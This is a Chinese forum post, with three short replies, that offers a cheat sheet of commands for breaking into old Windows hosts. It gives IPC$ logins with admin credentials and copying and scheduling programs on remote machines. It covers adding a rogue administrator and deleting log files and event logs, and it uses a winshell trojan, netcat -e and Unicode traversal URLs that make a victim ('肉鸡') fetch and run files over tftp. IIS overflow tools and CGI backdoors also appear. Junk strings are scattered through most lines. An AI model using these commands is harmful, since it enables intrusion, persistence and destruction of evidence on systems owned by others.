社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 2997阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 L.$+W}  
常用的几条NET命令: gH[lpRu|7  
39Zs  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" e*/ya8p?  
G}0fk]%\:  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" mP+rPDGp  
[+ N 5  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ qp`G5bw  
.9u,54t  
(查看远程主机时间) net time \\IP地址 a4D4*=!G0  
}< m@82\  
(定时启动某个程序) at \\IP地址 02:18 readme.exe zE_t(B(Q  
gLQbA$gB  
(查看共享) net view \\IP地址 P#x]3j]  
yL%k5cO$N  
(查看netbios工作组列表) nbtstat -A IP地址 }c;h:CE#  
bl-t>aO*.V  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" ("rIz8b  
~8^)[n+)x  
(这两条把自己增加到管理员组): net user 用户名 密码 /add * ~4m!U_s  
-"X} )N2  
net localgroup Administrators 用户名 /add Rss=ihlM  
 !#Hca  
(断开连接) net use \\IP地址\ipc$ /delete VkDFR [k_  
Tx0l^(n  
扫尾: K}YOs.  
;J40t14u  
del C:\winnt\system32\logfiles\*.* V[BlT|t  
dD}!E  
del C:\winnt\ssytem32\config\*.evt #zv'N  
Xn:ac^  
del C:\winnt\system32\dtclog\*.* +H8;*uZ|k,  
;WpPdR2  
del C:\winnt\system32\*.log ^><B5A>;  
,O}2LaK.O  
del C:\winnt\system32\*.txt YcJ2Arml  
js8GK  
del C:\winnt\*.txt "K*+8 IO2  
^jMo?Zwy  
del C:\winnt\*.log +gsk}>"  
DU: sQS4  
一、netsvc.exe d8T,33>T  
#p^r)+\3=  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: g+iV0bbT  
`%M} :T  
netsvc /list \\IP地址 QWWoj[d#  
NurbioFL  
netsvc schedule \\IP地址 /query j[o5fr)L  
q;a#?Du o  
netsvc \\IP地址 schedule /start DUK.-|a7  
;q&\>u:  
二、OpenTelnet.exe UZUG ?UUM  
.1C|J  
远程启动主机的Telnet服务,并绑定端口到7878,例如: 3` aJ"qQE  
,*$/2nB^  
OpenTelnet \\IP地址 用户名 密码 1 7878 *>XY' -;2e  
y:zo/#34  
然后就可以telnet到主机的7878端口,进入DOS方式下: D7Nz3.j  
j']Q-s(s  
telnet IP地址 7878 pd{;`EW|  
%C8fv|@:f  
三、winshell.exe > AV R3b  
jn;b{*Lf  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: Y)L\*+ >"[  
5bzYTK&-  
p Path (查看winshell主程序的路径信息) WsCzC_'j.  
^2PQ75V@.  
b reBoot (重新启动机器) l C|{{?m  
+/Lf4??JV  
d shutDown (关闭机器) fKY1=3  
~-w  
s Shell (执行后你就会看到可爱的“C:\>”) 7l})`> k  
4IYC;J2L  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) K!9rH>`\  
|V|)cPQ  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 9/k?Lv  
(dC<N3  
四、3389登陆器,GUI方式登录远程主机的 &sx|sLw)  
|k4ZTr]?  
五、elsave.exe q[3b i!Q  
)>LC*_v  
事件日志清除工具 r4c3t,L*$I  
G r;~P*  
elsave -s \\IP地址 -l "application" -C (A*r&Ak[  
"Rp]2'?  
elsave -s \\IP地址 -l "system" -C 1% )M-io  
'c<@SVF{Zz  
elsave -s \\IP地址 -l "security" -C #:68}f"$  
:;XHA8  
执行后成功清除应用程序日志,系统日志,安全日志 ;v6e2NacM'  
Eu )7@  
六、hbulot.exe XjwTjgL<  
`<>8tZS9"  
开启win2kserver和winxp的3389服务 A{E0 a:v  
XfxNyZsy&>  
hbulot [/r] Xklp6{VH9  
NwG&uc+Q  
使用/r表示安装完成后自动重起目标使设置生效。 9CWUhS   
o+O\VNW  
七、nc.exe(netcat.exe) 8[FC  
*3<m<<>U  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 FJ}QKDQW=  
':!;6v|L  
想要连接到某处: nc [-options] hostname port[s] [ports] ... uu>[WFh  
'eo2a&S2D  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] *0R=(Gy  
g-%uw[pf  
参数: ii*Ty!Sa  
i c]f o  
-e prog 程序重定向,一旦连接,就执行 [危险!!] *qG=p`  
m[{*an\  
-g gateway source-routing hop point[s], up to 8 qgca4VV|z  
1{"fmV  
-G num source-routing pointer: 4, 8, 12, ... 7@DinA!  
jq["z<V )x  
-h 帮助信息 @/JGC%!  
DoPm{055J  
-i secs 延时的间隔 AX1'.   
!@/?pXt|  
-l 监听模式,用于入站连接 S&]:=He  
@ z#k~  
-n 指定数字的IP地址,不能用hostname SAG) vmm  
(>0d+ KT  
-o file 记录16进制的传输 ?V[yw=sl04  
zPV/{)S  
-p port 本地端口号 G-n`X":$DT  
SQ5*?u\  
-r 任意指定本地及远程端口 } 2)s%  
uB,B%XHj  
-s addr 本地源地址 !4jS=Lhe>  
 fV}\  
-u UDP模式 m ]K.0E  
JZL!(>tI  
-v 详细输出——用两个-v可得到更详细的内容 q{7s.m >  
xel&8 `  
-w secs timeout的时间 ~.x!st}  
@-b}iP<T  
-z 将输入输出关掉——用于扫描时 H[,.nH_>+  
八、TFTPD32.EXE ?EX'j >  
8d)F#  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: [1nI%/</>  
fJE ki>1  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 ooZ7HTP|  
$z mES tcm  
然后可以直接令文件运行: 2z[Pw0#V  
{b<8Z*4W  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 Gs?W7}<$  
_-8,}F}W#s  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 !Q7   
jSYj+k  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 @/0aj  
6xFZv t  
一、一 Xscan命令行运行参数说明: K.z}%a  
e('c 9 Y  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 Tz*5;y%4  
*h =7:*n  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] x(b&r g.-0  
RPiCXpJv&  
xscan -file <主机列表文件名> <检测项目> [其他选项] ao-C9|2>NU  
mG@Q}Y(  
其中<检测项目> 含义如下: bY>o%LL-  
2s{yg%U(  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); R9CAw>s  
CYrL|{M]  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); _~cmR<  
OC>" +  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); Jx>P%>+<j  
<m(nZ'Zqz2  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); r\3In-(AT  
F}01ikXDb'  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); lHGv:TN  
. t3@86xTJ  
[其他选项] 含义如下: "Z{^i3 gN  
D\`$  
-v: 显示详细扫描进度 W;-Qze\D  
u%h<5WNh<  
-p: 跳过Ping不通的主机 _+;x 4K;  
z{n=G  
-o: 跳过没有检测到开放端口的主机 r\Nn WS J  
J5o"JRJ"  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 1Jd:%+T  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八